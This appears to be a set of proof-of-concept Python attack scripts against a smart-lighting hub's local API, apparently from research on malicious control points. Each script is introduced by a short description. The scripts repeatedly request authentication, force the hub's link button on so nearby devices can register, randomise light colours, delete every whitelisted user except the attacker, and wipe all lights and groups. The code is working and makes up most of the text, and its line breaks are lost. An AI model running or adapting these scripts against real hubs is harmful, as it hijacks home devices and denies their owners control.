This script represents a malicious CP which spams authentication request, until the benign user presses the physical button on the hub.
import requests, jsonurl = 'http://192.168.0.100/api' # destination URL post_fields = {"devicetype":"blabla"} # POST fields headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}x = 1;while x<10000: print('Waiting for the owner click on link button...') r = requests.post(url, json=post_fields, headers=headers) data = r.json() if 'username' in str(data): print(x,data) for uid in data: print('\n........your userID is '+uid.get('success').get('username')) print('\n\n.........Attacker got a user name!!!!!!!!!!!!!!!') break x+=1Here, a malicious CP which already authenticated with the hub, sends "LinkButtonTrue" requests to the hub. Hence, anyone in the neighborhood can successfully get authenticated with the hub without requiring the user to press the physical button on the hub.
import requests, jsonattackerID = 'eiCVNTofIApdqdqIdXqW4l5ZufCig6kCJvZzG4kz'url = 'http://192.168.0.100/api/'+attackerID+'/' # get request URL headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}#Keep sending linkbutton false requestput_fields = {'linkbutton':True} # PUT fields attack_4_url = url+'config'i = 1;while i<1000: i += 1 requestStatusData = requests.get(url,headers=headers).json() statusRequst = requestStatusData.get('config').get('linkbutton') if statusRequst == False: print('linkbutton status: '+ str(statusRequst)) requests.put(attack_4_url, json=put_fields,headers=headers).json() print('Sending linkbutton True request... to update the status of the hub '+ str(i))The malicous CP which got access to the system manipulates the smart device, such that the smart device becomes uncontrollable to the benign user.
import requests, json, time, randomattackerID = 'eiCVNTofIApdqdqIdXqW4l5ZufCig6kCJvZzG4kz'url = 'http://192.168.0.100/api/'+attackerID+'/' # get request URL headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}requestData = requests.get(url,headers=headers).json()#Attacker change light color as well.lightIDsET = requestData.get('lights').keys()for key in lightIDsET: if requestData.get('lights').get(key).get('state').get('reachable')==True: attack_2_url = url+'lights/'+key+'/state' i = 1; while i<1000: i += 1 colorChangedResponse = requests.put(attack_2_url,json ={'hue':random.randrange(12000,66000,2)} ,headers=headers).json()The malicious CP further deletes all the whitlisted userIDs that are stored in the hub, including any new userID added. Hence, a denial-of-service occurs at the hub .
import requests, json, timeattackerID = 'eiCVNTofIApdqdqIdXqW4l5ZufCig6kCJvZzG4kz'url = 'http://192.168.0.100/api/'+attackerID+'/' # get request URL headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}requestData = requests.get(url,headers=headers).json()#Attacker get the whitelist from hub and delete all the userID'suserIDset = requestData.get('config').get('whitelist').keys()print(len(userIDset))for key in userIDset: if key != attackerID and len(userIDset)>1: attack_1_url = url+'config/whitelist/'+key deleteResponse = requests.delete(attack_1_url,headers=headers).json() for x in deleteResponse: print('Deleting UserIDs...'+x.get('success')) else: print('only attackerID is remaining = '+key)time.sleep(20)print('Heads up...')#Keep send request to delete any new userID'si = 1;while i<1000: i += 1 newDataRequest = requests.get(url,headers=headers).json() userIDset = newDataRequest.get('config').get('whitelist').keys() for key in userIDset: if key != attackerID and len(userIDset)>1: attack_1_url = url+'config/whitelist/'+key deleteResponse = requests.delete(attack_1_url,headers=headers).json() print(deleteResponse) else: print('only attackerID is remaining = '+key)The malicious CP deletes all the smart devices configurations at the hub. Hence, a denial-of-service occurs at the smart device.
import requests, json, timeattackerID = 'eiCVNTofIApdqdqIdXqW4l5ZufCig6kCJvZzG4kz'url = 'http://192.168.0.100/api/'+attackerID+'/' # get request URL headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}requestData = requests.get(url,headers=headers).json()#Attacker detelte all lights as well.lightIDsET = requestData.get('lights').keys()for key in lightIDsET: attack_2_url = url+'lights/'+key deleteLightResponse = requests.delete(attack_2_url,headers=headers).json() for x in deleteLightResponse: print('Deleting Lights...'+x.get('success'))time.sleep(20)print('Heads up...') #Attacker delete all the saved groups in the hubgroupIDsET = requestData.get('groups').keys()for key in groupIDsET: attack_3_url = url+'groups/'+key deleteGroupsResponse = requests.delete(attack_3_url,headers=headers).json() for x in deleteGroupsResponse: print('Deleting Groups...'+x.get('success'))